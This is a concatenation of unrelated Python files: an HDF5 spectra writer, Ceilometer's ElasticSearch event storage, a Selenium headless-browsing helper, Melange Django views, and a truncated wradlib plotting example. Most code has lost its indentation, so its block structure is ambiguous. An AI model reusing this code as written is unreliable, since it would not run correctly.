#MAPS HDF5 group
if 'MAPS' in f:
if verbose:
self.logger.debug('MAPS group found in file: %s', hfilename)
mapsGrp = f['MAPS']
file_status = 3
if 'mca_arr' in mapsGrp:
if verbose:
self.logger.debug('MAPS\\mca_arr found in file: %s', hfilename)
file_status = 4
# at the moment, simply overwrite the mca_arr section of
# the file; in the future, may want to test, and only
# overwrite if specific flag is set.
f.close()
except:
if verbose:
self.logger.debug('Creating new file: %s', hfilename)
if verbose:
self.logger.debug('file_status: %s', file_status)
if overwrite:
file_status = 0
self.logger.debug('hfilename: %s', hfilename)
if file_status <= 1 :
f = h5py.File(hfilename, 'w')
else :
f = h5py.File(hfilename, 'a')
if file_status <= 3 :
# create a group for maps to hold the data
mapsGrp = f.create_group('MAPS')
# now set a comment
        mapsGrp.attrs['comments'] = 'This is the group that stores all relevant information created (and read) by the MAPS analysis software'
if file_status >= 4 :
mapsGrp = f['MAPS']
entry_exists = 1
if entry_exists == 0:
# create dataset and save full spectra
data = np.transpose(mca_arr)
dimensions = data.shape
chunk_dimensions = (dimensions[0], 1, 1)
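            # One chunk per pixel (assuming the spectrum axis is last in mca_arr,
            # the transpose moves it first), so each chunk holds the full
            # spectrum for a single (x, y) position.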
comment = 'these are the full spectra at each pixel of the dataset'
ds_data = mapsGrp.create_dataset('mca_arr', data = data, chunks=chunk_dimensions, compression='gzip', compression_opts=gzip)
ds_data.attrs['comments'] = comment
else:
# save the data to existing array
# delete old dataset, create new and save full spectra
data = np.transpose(mca_arr)
dimensions = data.shape
chunk_dimensions = (dimensions[0], 1, 1)
comment = 'these are the full spectra at each pixel of the dataset'
del mapsGrp['mca_arr']
ds_data = mapsGrp.create_dataset('mca_arr', data = data, chunks=chunk_dimensions, compression='gzip', compression_opts=gzip)
ds_data.attrs['comments'] = comment
entryname = 'x_axis'
comment = 'stores the values of the primary fast axis positioner, typically sample x'
data = realX
ds_data = mapsGrp.create_dataset(entryname, data = data)
ds_data.attrs['comments'] = comment
entryname = 'y_axis'
comment = 'stores the values of the slow axis positioner, typically sample y'
data = sc_MicroFocusSampleY
ds_data = mapsGrp.create_dataset(entryname, data = data)
ds_data.attrs['comments'] = comment
f.close()
return
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import operator
import elasticsearch as es
from elasticsearch import helpers
from oslo_log import log
from oslo_utils import netutils
from oslo_utils import timeutils
import six
from ceilometer.event.storage import base
from ceilometer.event.storage import models
from ceilometer.i18n import _LE, _LI
from ceilometer import storage
from ceilometer import utils
LOG = log.getLogger(__name__)
AVAILABLE_CAPABILITIES = {
'events': {'query': {'simple': True}},
}
AVAILABLE_STORAGE_CAPABILITIES = {
'storage': {'production_ready': True},
}
class Connection(base.Connection):
"""Put the event data into an ElasticSearch db.
Events in ElasticSearch are indexed by day and stored by event_type.
An example document::
{"_index":"events_2014-10-21",
"_type":"event_type0",
"_id":"dc90e464-65ab-4a5d-bf66-ecb956b5d779",
"_score":1.0,
"_source":{"timestamp": "2014-10-21T20:02:09.274797"
"traits": {"id4_0": "2014-10-21T20:02:09.274797",
"id3_0": 0.7510790937279408,
"id2_0": 5,
"id1_0": "18c97ba1-3b74-441a-b948-a702a30cbce2"}
}
}
"""
CAPABILITIES = utils.update_nested(base.Connection.CAPABILITIES,
AVAILABLE_CAPABILITIES)
STORAGE_CAPABILITIES = utils.update_nested(
base.Connection.STORAGE_CAPABILITIES,
AVAILABLE_STORAGE_CAPABILITIES,
)
index_name = 'events'
# NOTE(gordc): mainly for testing, data is not searchable after write,
# it is only searchable after periodic refreshes.
_refresh_on_write = False
def __init__(self, url):
url_split = netutils.urlsplit(url)
self.conn = es.Elasticsearch(url_split.netloc)
def upgrade(self):
iclient = es.client.IndicesClient(self.conn)
ts_template = {
'template': '*',
'mappings': {'_default_':
{'_timestamp': {'enabled': True,
'store': True},
'properties': {'traits': {'type': 'nested'}}}}}
iclient.put_template(name='enable_timestamp', body=ts_template)
def record_events(self, events):
def _build_bulk_index(event_list):
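            # Turn each Event model into an ES bulk 'create' action aimed at the
            # per-day index for the event's 'generated' timestamp.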
for ev in event_list:
traits = {t.name: t.value for t in ev.traits}
yield {'_op_type': 'create',
'_index': '%s_%s' % (self.index_name,
ev.generated.date().isoformat()),
'_type': ev.event_type,
'_id': ev.message_id,
'_source': {'timestamp': ev.generated.isoformat(),
'traits': traits,
'raw': ev.raw}}
error = None
for ok, result in helpers.streaming_bulk(
self.conn, _build_bulk_index(events)):
if not ok:
__, result = result.popitem()
if result['status'] == 409:
LOG.info(_LI('Duplicate event detected, skipping it: %s')
% result)
else:
LOG.exception(_LE('Failed to record event: %s') % result)
error = storage.StorageUnknownWriteError(result)
if self._refresh_on_write:
self.conn.indices.refresh(index='%s_*' % self.index_name)
while self.conn.cluster.pending_tasks(local=True)['tasks']:
pass
if error:
raise error
def _make_dsl_from_filter(self, indices, ev_filter):
q_args = {}
filters = []
if ev_filter.start_timestamp:
filters.append({'range': {'timestamp':
{'ge': ev_filter.start_timestamp.isoformat()}}})
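            # Daily indices are named '<index_name>_<YYYY-MM-DD>', so trim
            # leading indices that fall before the requested start date.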
while indices[0] < (
'%s_%s' % (self.index_name,
ev_filter.start_timestamp.date().isoformat())):
del indices[0]
if ev_filter.end_timestamp:
filters.append({'range': {'timestamp':
{'le': ev_filter.end_timestamp.isoformat()}}})
while indices[-1] > (
'%s_%s' % (self.index_name,
ev_filter.end_timestamp.date().isoformat())):
del indices[-1]
q_args['index'] = indices
if ev_filter.event_type:
q_args['doc_type'] = ev_filter.event_type
if ev_filter.message_id:
filters.append({'term': {'_id': ev_filter.message_id}})
if ev_filter.traits_filter or ev_filter.admin_proj:
trait_filters = []
or_cond = []
for t_filter in ev_filter.traits_filter or []:
value = None
for val_type in ['integer', 'string', 'float', 'datetime']:
if t_filter.get(val_type):
value = t_filter.get(val_type)
if isinstance(value, six.string_types):
value = value.lower()
elif isinstance(value, datetime.datetime):
value = value.isoformat()
break
if t_filter.get('op') in ['gt', 'ge', 'lt', 'le']:
op = (t_filter.get('op').replace('ge', 'gte')
.replace('le', 'lte'))
trait_filters.append(
{'range': {t_filter['key']: {op: value}}})
else:
tf = {"query": {"query_string": {
"query": "%s: \"%s\"" % (t_filter['key'], value)}}}
if t_filter.get('op') == 'ne':
tf = {"not": tf}
trait_filters.append(tf)
if ev_filter.admin_proj:
or_cond = [{'missing': {'field': 'project_id'}},
{'term': {'project_id': ev_filter.admin_proj}}]
filters.append(
{'nested': {'path': 'traits', 'query': {'filtered': {
'filter': {'bool': {'must': trait_filters,
'should': or_cond}}}}}})
q_args['body'] = {'query': {'filtered':
{'filter': {'bool': {'must': filters}}}}}
return q_args
def get_events(self, event_filter, limit=None):
if limit == 0:
return
iclient = es.client.IndicesClient(self.conn)
indices = iclient.get_mapping('%s_*' % self.index_name).keys()
if indices:
filter_args = self._make_dsl_from_filter(indices, event_filter)
if limit is not None:
filter_args['size'] = limit
results = self.conn.search(fields=['_id', 'timestamp',
'_type', '_source'],
sort='timestamp:asc',
**filter_args)
trait_mappings = {}
for record in results['hits']['hits']:
trait_list = []
if not record['_type'] in trait_mappings:
trait_mappings[record['_type']] = list(
self.get_trait_types(record['_type']))
for key in record['_source']['traits'].keys():
value = record['_source']['traits'][key]
for t_map in trait_mappings[record['_type']]:
if t_map['name'] == key:
dtype = t_map['data_type']
break
else:
dtype = models.Trait.TEXT_TYPE
trait_list.append(models.Trait(
name=key, dtype=dtype,
value=models.Trait.convert_value(dtype, value)))
gen_ts = timeutils.normalize_time(timeutils.parse_isotime(
record['_source']['timestamp']))
yield models.Event(message_id=record['_id'],
event_type=record['_type'],
generated=gen_ts,
traits=sorted(
trait_list,
key=operator.attrgetter('dtype')),
raw=record['_source']['raw'])
def get_event_types(self):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = set()
for index in es_mappings.keys():
for ev_type in es_mappings[index]['mappings'].keys():
seen_types.add(ev_type)
# TODO(gordc): tests assume sorted ordering but backends are not
# explicitly ordered.
        # NOTE: _default_ is a type that appears in all mappings but is not a
        # real 'type'.
seen_types.discard('_default_')
return sorted(list(seen_types))
@staticmethod
def _remap_es_types(d_type):
if d_type == 'string':
d_type = 'text'
elif d_type == 'long':
d_type = 'int'
elif d_type == 'double':
d_type = 'float'
elif d_type == 'date' or d_type == 'date_time':
d_type = 'datetime'
return d_type
def get_trait_types(self, event_type):
iclient = es.client.IndicesClient(self.conn)
es_mappings = iclient.get_mapping('%s_*' % self.index_name)
seen_types = []
for index in es_mappings.keys():
# if event_type exists in index and has traits
if (es_mappings[index]['mappings'].get(event_type) and
es_mappings[index]['mappings'][event_type]['properties']
['traits'].get('properties')):
for t_type in (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties'].keys()):
d_type = (es_mappings[index]['mappings'][event_type]
['properties']['traits']['properties']
[t_type]['type'])
d_type = models.Trait.get_type_by_name(
self._remap_es_types(d_type))
if (t_type, d_type) not in seen_types:
yield {'name': t_type, 'data_type': d_type}
seen_types.append((t_type, d_type))
def get_traits(self, event_type, trait_type=None):
t_types = dict((res['name'], res['data_type'])
for res in self.get_trait_types(event_type))
if not t_types or (trait_type and trait_type not in t_types.keys()):
return
result = self.conn.search('%s_*' % self.index_name, event_type)
for ev in result['hits']['hits']:
if trait_type and ev['_source']['traits'].get(trait_type):
yield models.Trait(
name=trait_type,
dtype=t_types[trait_type],
value=models.Trait.convert_value(
t_types[trait_type],
ev['_source']['traits'][trait_type]))
else:
for trait in ev['_source']['traits'].keys():
yield models.Trait(
name=trait,
dtype=t_types[trait],
value=models.Trait.convert_value(
t_types[trait],
ev['_source']['traits'][trait]))
|
|
# -*- coding=utf-8 -*-
from selenium.webdriver import Firefox, Chrome, FirefoxProfile
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.events import (EventFiringWebDriver,
AbstractEventListener)
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import (InvalidSelectorException,
TimeoutException,
ElementNotVisibleException)
from xvfbwrapper import Xvfb
from time import sleep
import urlparse
from shutil import rmtree
from tempfile import mkdtemp
from os import (listdir,
sep as os_sep)
class ConnectionError(Exception):
"""Generic error for timeouts, server error etc,
that are outside our control.
"""
class CustomListener(AbstractEventListener):
"""This class is needed by EventFiringWebDriver.
"""
pass
class Surfer:
"""This class does virtual web surfing on our demand
"""
def __init__(self, delay=1, browser="firefox"):
"""delay: Number of extra seconds to wait when a page is
supposedly loaded. Try raising this in case of weird errors.
browser: `firefox` or `chrome`. The ChromeDriver executable for your
OS must be inside the bin directory for Chrome to work. Get it from:
http://chromedriver.storage.googleapis.com/index.html
"""
self.extra_delay = delay # extra time to wait after each operation (s)
self.temp_dir = mkdtemp()
self.vdisplay = Xvfb()
self.vdisplay.start()
if browser == "firefox":
profile = FirefoxProfile()
# Open links in same window
profile.set_preference("browser.link.open_newwindow", 1)
# Download to temp dir, for files we can't open inline
profile.set_preference("browser.download.dir", self.temp_dir)
profile.set_preference("browser.download.folderList", 2)
profile.set_preference("browser.download.manager.showWhenStarting",
"False")
profile.set_preference("browser.helperApps.neverAsk.saveToDisk",
"application/msword, application/vnd.ms-word, application/rtf, application/octet-stream")
# Add extension for overriding Content-Disposition headers, etc
extensions_dir = os_sep.join(['bin', 'firefox-plugins-enabled'])
for filename in listdir(extensions_dir):
fullfilename = os_sep.join([extensions_dir, filename])
profile.add_extension(extension=fullfilename)
driver = Firefox(profile)
elif browser == "chrome":
# Add extension for overriding Content-Disposition headers
options = ChromeOptions()
options.add_extension('bin/undisposition.crx')
driver = Chrome(executable_path='bin/chromedriver',
chrome_options=options)
else:
raise Exception("Not a valid browser name")
self.selenium_driver = EventFiringWebDriver(driver, CustomListener())
"""selenium_driver is a EventFiringWebDriver, so that it can
trigger javascript event
"""
self.browser_version = " ".join([
self.selenium_driver.capabilities['browserName'],
self.selenium_driver.capabilities['version']]) # 'Firefox 33.0'
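    # A minimal construction sketch (values assumed, not part of this module):
    #
    #     surfer = Surfer(delay=2, browser="firefox")
    #     surfer.surf_to("http://example.com")
    #     links = surfer.get_url_list("//a")
    #     surfer.kill()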
def get_last_download(self):
files = sorted([
f for f in listdir(self.temp_dir)])
if len(files) > 0:
return self.temp_dir + os_sep + files[-1]
else:
return None
    def _get_nearest_ancestor(self, element, tagname):
        """Walk up the DOM from `element` until an ancestor with the
        given tag name is found. Returns None if there is no such ancestor."""
        ancestor = element.find_element_by_xpath("..")
        while ancestor is not None and ancestor.tag_name != tagname:
            try:
                # step up from the current ancestor, not from the original
                # element, so the walk actually progresses
                ancestor = ancestor.find_element_by_xpath("..")
            except InvalidSelectorException:
                ancestor = None
        return ancestor
def _scroll_element_into_view(self, element):
"""Scroll attached element into view
"""
y = element.location['y']
self.selenium_driver.execute_script('window.scrollTo(0, {0})'
.format(y))
def with_open_in_new_window(self, element, callback_, *args, **kwargs):
"""Shift-clicks on an element to open a new window,
calls the callback function, and then closes the
window and returns.
        This is useful for iterating through a link tree
        we cannot easily step back in (e.g. where the starting
        page is the result of a POST request).
Callback function is called like this: `callback(Surfer, arguments)`
with a Surfer object placed in the new window
Returns the result of `callback`
"""
try:
actions = ActionChains(self.selenium_driver)
actions.move_to_element(element).perform()
self._scroll_element_into_view(element)
element.send_keys(Keys.SHIFT + Keys.ENTER)
except ElementNotVisibleException:
raise
self.selenium_driver.implicitly_wait(self.extra_delay)
sleep(self.extra_delay) # implicitly_wait doesn't work on FF?
windows = self.selenium_driver.window_handles
self.selenium_driver.switch_to_window(windows[-1])
if len(windows) > 1:
res = callback_(self, *args, **kwargs)
self.selenium_driver.close()
windows = self.selenium_driver.window_handles
self.selenium_driver.switch_to_window(windows[-1])
return res
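    # Illustrative callback usage (names are made up for this sketch):
    #
    #     def grab_title(surfer):
    #         return surfer.selenium_driver.title
    #
    #     link = surfer.get_element_list("//a[@class='detail']")[0]
    #     title = surfer.with_open_in_new_window(link, grab_title)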
def surf_to(self, url):
"""Simply go to an URL"""
try:
self.selenium_driver.get(url)
except TimeoutException:
raise ConnectionError
self.selenium_driver.implicitly_wait(self.extra_delay)
def click_on_stuff(self, xpath):
"""Will click on any elements pointed out by xPath.
Options in select menus will be selected, and an
onChange event fired (as this does not always happen automatically)
"""
# FIXME: Select menus will only work if they have an id!
element_list = self.selenium_driver.find_elements_by_xpath(xpath)
if not element_list:
raise Exception("No elements found for xPath `%s`" % xpath)
else:
for element in element_list:
try:
element.click()
except ElementNotVisibleException:
                    # Element not visible. This is not necessarily an error,
# but the user might want to consider using a more
# specific xPath expression.
continue
# actions = ActionChains(self.selenium_driver)
# actions.move_to_element(element)
# actions.click(element)
# actions.send_keys_to_element(element, Keys.ENTER)
# actions.perform()
if "tag_name" in dir(element) and element.tag_name == "option":
parent = self._get_nearest_ancestor(element, "select")
if parent is not None:
# Should be selected already, when clicking,
# but it seems like this does not always happen
value = element.get_attribute("value") or None
if value is not None:
select = Select(parent)
select.select_by_value(value)
# Manually trigger JS events
select_id = parent.get_attribute("id") or None
if select_id is not None:
js_function = """
window.triggerChange=function(){\
var el = document.getElementById('""" + select_id + """');\
el.dispatchEvent(new Event('change', { 'bubbles': true }));\
el.dispatchEvent(new Event('select', { 'bubbles': true }));\
el.dispatchEvent(new Event('click', { 'bubbles': true }));\
};"""
self.selenium_driver.execute_script(js_function)
self.selenium_driver.execute_script("triggerChange();")
else:
raise Exception("No <select> tag found for <option>")
self.selenium_driver.implicitly_wait(self.extra_delay)
def get_url_list(self, xpath):
url_list = []
element_list = self.selenium_driver.find_elements_by_xpath(xpath)
for element in element_list:
href = element.get_attribute("href")
if href is not None:
url_list.append(Url(href))
return url_list # list of Url objects
def get_element_list(self, xpath):
try:
return self.selenium_driver.find_elements_by_xpath(xpath)
except InvalidSelectorException:
pass
# maybe our xPath points at an attribute?
try:
return self.selenium_driver.find_elements_by_xpath(xpath + "/..")
except InvalidSelectorException:
pass
return None
def kill(self):
self.selenium_driver.close()
self.vdisplay.stop()
rmtree(self.temp_dir)
class Url:
"""Represents a url, from e.g. Surfer.get_url_list()
"""
def __init__(self, url):
self.href = url
def is_absolute(self):
"""Check if url is absolute or relative"""
return bool(urlparse.urlparse(self.href).netloc)
def make_absolute(self, reference_url):
"""Makes this Url absolute, by using the domain from reference_url.
Does not handle protocol relative URLs
"""
        parse_object = urlparse.urlparse(reference_url)
url_base = parse_object.scheme + "://" + parse_object.netloc
self.href = url_base + self.href
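# Illustrative only (values assumed): a relative href is resolved against a
# reference URL before it is fetched.
#
#     url = Url("/documents/123")
#     if not url.is_absolute():
#         url.make_absolute("http://example.com/start")
#     # url.href is now "http://example.com/documents/123"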
if __name__ == "__main__":
print "This module is only intended to be called from other scripts."
import sys
sys.exit()
|
|
#!/usr/bin/python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Views for Requests.
"""
__authors__ = [
'"Sverre Rabbelier" <[email protected]>',
'"Lennard de Rijk" <[email protected]>',
'"Pawel Solyga" <[email protected]>',
]
from django import forms
from django import http
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.logic.models import user as user_logic
from soc.views import helper
from soc.views.helper import access
from soc.views.helper import decorators
from soc.views.helper import dynaform
from soc.views.helper import redirects
from soc.views.helper import responses
from soc.views.helper import widgets
from soc.views.models import base
import soc.models.request
import soc.logic.models.request
import soc.logic.dicts
import soc.views.helper
import soc.views.helper.lists
import soc.views.helper.responses
class View(base.View):
"""View methods for the Request model.
"""
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.Checker(params)
rights['listSelf'] = ['checkIsUser']
rights['create'] = ['deny']
rights['edit'] = ['checkIsDeveloper']
rights['process_invite'] = ['checkIsMyGroupAcceptedRequest']
rights['list'] = ['checkIsDeveloper']
rights['delete'] = ['checkIsDeveloper']
rights['roles'] = ['checkIsUser']
new_params = {}
new_params['rights'] = rights
new_params['logic'] = soc.logic.models.request.logic
new_params['name'] = "Request"
new_params['sidebar_defaults'] = [('/%s/list', 'List %(name_plural)s',
'list')]
new_params['create_template'] = ['soc/request/create.html']
new_params['extra_dynaexclude'] = ['status', 'role_verbose', 'created_on']
new_params['create_extra_dynaproperties'] = {
'link_id': widgets.ReferenceField(reference_url='user'),
'role': forms.CharField(widget=widgets.ReadOnlyInput(),
required=True),
'clean_link_id': cleaning.clean_existing_user('link_id'),
}
new_params['edit_extra_dynaproperties'] = {
'scope_path': forms.CharField(widget=forms.HiddenInput,
required=True),
}
patterns = [(r'^%(url_name)s/(?P<access_type>process_invite)/'
'%(key_fields)s$',
'soc.views.models.%(module_name)s.process_invite',
'Process Invite to become')]
new_params['extra_django_patterns'] = patterns
new_params['invite_processing_template'] = 'soc/request/process_invite.html'
new_params['request_processing_template'] = \
'soc/request/process_request.html'
params = dicts.merge(params, new_params)
super(View, self).__init__(params=params)
# create and store the special forms for invite and requests
self._params['invite_form'] = self._params['create_form']
updated_fields = {
'link_id': forms.CharField(widget=widgets.ReadOnlyInput(),
required=True),
'group_id': forms.CharField(widget=widgets.ReadOnlyInput(),
required=True)}
request_form = dynaform.extendDynaForm(
dynaform = self._params['create_form'],
dynaproperties = updated_fields)
self._params['request_form'] = request_form
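  # extendDynaForm derives a new form class from create_form with link_id and
  # group_id rendered read-only; create_form itself is left untouched and is
  # reused as the invite form above.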
@decorators.merge_params
@decorators.check_access
def processInvite(self, request, access_type,
page_name=None, params=None, **kwargs):
"""Creates the page upon which an invite can be processed.
Args:
request: the standard Django HTTP request object
access_type : the name of the access type which should be checked
page_name: the page name displayed in templates as page and header title
params: a dict with params for this View
kwargs: the Key Fields for the specified entity
"""
# get the context for this webpage
context = responses.getUniversalContext(request)
helper.responses.useJavaScript(context, params['js_uses_all'])
request_logic = params['logic']
# get the request entity using the information from kwargs
fields = {'link_id': kwargs['link_id'],
'scope_path': kwargs['scope_path'],
'role': kwargs['role'],
'status': 'group_accepted'}
request_entity = request_logic.getForFields(fields, unique=True)
# set the page name using the request_entity
context['page_name'] = '%s %s' % (page_name,
request_entity.role_verbose)
get_dict = request.GET
if 'status' in get_dict.keys():
if get_dict['status'] == 'rejected':
        # this invite has been rejected, so mark it as rejected
request_logic.updateEntityProperties(request_entity, {
'status': 'rejected'})
# redirect to user request overview
return http.HttpResponseRedirect('/user/requests')
# put the entity in the context
context['entity'] = request_entity
context['module_name'] = params['module_name']
context['invite_accepted_redirect'] = (
redirects.getInviteAcceptedRedirect(request_entity, self._params))
    # display the invite processing page using the appropriate template
template = params['invite_processing_template']
return responses.respond(request, template, context=context)
@decorators.merge_params
@decorators.check_access
def listSelf(self, request, access_type,
page_name=None, params=None, **kwargs):
"""Displays the unhandled requests for this user.
Args:
request: the standard Django HTTP request object
access_type : the name of the access type which should be checked
page_name: the page name displayed in templates as page and header title
params: a dict with params for this View
kwargs: not used
"""
# get the current user
user_entity = user_logic.logic.getForCurrentAccount()
# construct the Unhandled Invites list
# only select the Invites for this user that haven't been handled yet
filter = {'link_id': user_entity.link_id,
'status': 'group_accepted'}
uh_params = params.copy()
uh_params['list_action'] = (redirects.getInviteProcessRedirect, None)
uh_params['list_description'] = ugettext(
"An overview of your unhandled invites.")
uh_list = helper.lists.getListContent(
request, uh_params, filter, idx=0)
# construct the Open Requests list
# only select the requests from the user
# that haven't been accepted by an admin yet
filter = {'link_id': user_entity.link_id,
'status': 'new'}
ar_params = params.copy()
ar_params['list_description'] = ugettext(
"List of your pending requests.")
ar_list = helper.lists.getListContent(
request, ar_params, filter, idx=1)
# fill contents with all the needed lists
contents = [uh_list, ar_list]
# call the _list method from base to display the list
return self._list(request, params, contents, page_name)
view = View()
admin = decorators.view(view.admin)
create = decorators.view(view.create)
edit = decorators.view(view.edit)
delete = decorators.view(view.delete)
list = decorators.view(view.list)
list_self = decorators.view(view.listSelf)
process_invite = decorators.view(view.processInvite)
public = decorators.view(view.public)
export = decorators.view(view.export)
|
|
# ------------------------------------------------------------------------------
# Name: plot_cg_ppi_example.py
# Purpose: show a few examples on how to use wradlib.vis.plot_cg_ppi
#
# Author: Kai Muehlbauer
#
# Created: 25.02.2014
# Copyright: (c) Kai Muehlbauer 2014
# Licence: The MIT License
# ------------------------------------------------------------------------------
import numpy as np
# importing most matplotlib routines at once
import matplotlib.pyplot as pl
#pl.interactive(True)
# well, it's a wradlib example
import wradlib
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.ticker import NullFormatter,FuncFormatter, MaxNLocator
import os
def ex_plot_cg_ppi():
# pl.interactive(True)
# load a polar scan and create range and azimuth arrays accordingly
data = np.loadtxt(os.path.dirname(__file__) + '/' + 'data/polar_dBZ_tur.gz')
r = np.arange(0, data.shape[1])
az = np.arange(0, data.shape[0])
# mask data array for better presentation
mask_ind = np.where(data <= np.nanmin(data))
data[mask_ind] = np.nan
ma = np.ma.array(data, mask=np.isnan(data))
# cgax - curvelinear grid axis
# Main axis
# caax - twin cartesian axis
# secondary axis for cartesian coordinates (plotting, labeling etc.)
# paax - polar axis for plotting
# here all plotting in polar data is done
# pm - pcolormesh
# actual plot mappable
# Remark #1:
# The tight_layout function is great, but may not lead to
# satisfactory results in the first place. So labels, annotations
# and/or axes may need adjustment
# Remark #2:
    # This example makes heavy use of new matplotlib functionality. See
# function help for more information.
# ----------------------------------------------------------------
# First, creation of four simple figures
# figure #1
# the simplest call, plot cg ppi in new window
# plot simple CG PPI
wradlib.vis.plot_cg_ppi(ma, refrac=False)
t = pl.title('Simple CG PPI')
t.set_y(1.05)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #2
# now let's just plot a sector of data
# for this, we need to give the ranges and azimuths explicitly
    # and one more than we pass in the data, because we are not using
    # the autoext feature; otherwise the last row and column of our data
    # would not be plotted
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False, refrac=False)
t = pl.title('Sector CG PPI')
t.set_y(1.05)
pl.tight_layout()
# plot some additional polar and cartesian data
# cgax and caax plot both cartesian data
# paax plots polar data
# plot on cartesian axis
caax.plot(-60, -60, 'ro', label="caax")
caax.plot(-50, -70, 'ro')
# plot on polar axis
xx, yy = np.meshgrid(230, 90)
paax.plot(xx, yy, 'bo')
paax.plot(220, 90, 'bo', label="paax")
# plot on cg axis (same as on cartesian axis)
cgax.plot(-50, -60, 'go', label="cgax")
# legend on main cg axis
cgax.legend()
# ----------------------------------------------------------------
# figure #3
# now let's plot with given range and theta arrays
# and plot some annotation and colorbar
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, r, az, autoext=True,
refrac=False)
t = pl.title('Decorated CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
pl.tight_layout()
# ----------------------------------------------------------------
# figure #4
# now let's just plot a sector of data
# and plot some annotation and colorbar
    # create a floating axis for range
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False,
refrac=False)
t = pl.title('Decorated Sector CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
cgax.axis["lat"] = cgax.new_floating_axis(0, 240)
cgax.axis["lat"].set_ticklabel_direction('-')
cgax.axis["lat"].label.set_text("range [km]")
cgax.axis["lat"].label.set_rotation(180)
cgax.axis["lat"].label.set_pad(10)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5
# plot figure #1-4 in one figure 2x2 grid
pl.figure()
# figure #5-1
# the simplest call, plot cg ppi in new window
# plot simple CG PPI
wradlib.vis.plot_cg_ppi(ma, refrac=False, subplot=221)
t = pl.title('Simple CG PPI')
t.set_y(1.05)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5-2
# now let's just plot a sector of data
# for this, we need to give the ranges and azimuths explicitly
    # and one more than we pass in the data, because we are not using
    # the autoext feature; otherwise the last row and column of our data
    # would not be plotted
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False, refrac=False,
subplot=222)
t = pl.title('Sector CG PPI')
t.set_y(1.05)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5-3
# now let's plot with given range and theta arrays
# and plot some annotation and colorbar
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, r, az, autoext=True,
refrac=False, subplot=223)
t = pl.title('Decorated CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5-4
# now let's just plot a sector of data
# and plot some annotation and colorbar
    # create a floating axis for range
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False,
refrac=False,
subplot=224)
t = pl.title('Decorated Sector CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
cgax.axis["lat"] = cgax.new_floating_axis(0, 240)
cgax.axis["lat"].set_ticklabel_direction('-')
cgax.axis["lat"].label.set_text("range [km]")
cgax.axis["lat"].label.set_rotation(180)
cgax.axis["lat"].label.set_pad(10)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #6
# create figure with GridSpec
pl.figure()
gs = gridspec.GridSpec(5, 5)
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[0:3, 0:3])
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[0:3, 3:5])
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[3:5, 0:3])
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[3:5, 3:5])
t = pl.gcf().suptitle('GridSpec CG Example')
pl.tight_layout()
# ----------------------------------------------------------------
# figure #7
# create figure with co-located x and y-axis
# using axesgrid1 toolkit
def mip_formatter(x, pos):
x = x / 1000.
fmt_str = '{:g}'.format(x)
if np.abs(x) > 0 and np.abs(x) < 1:
return fmt_str.replace("0", "", 1)
else:
return fmt_str
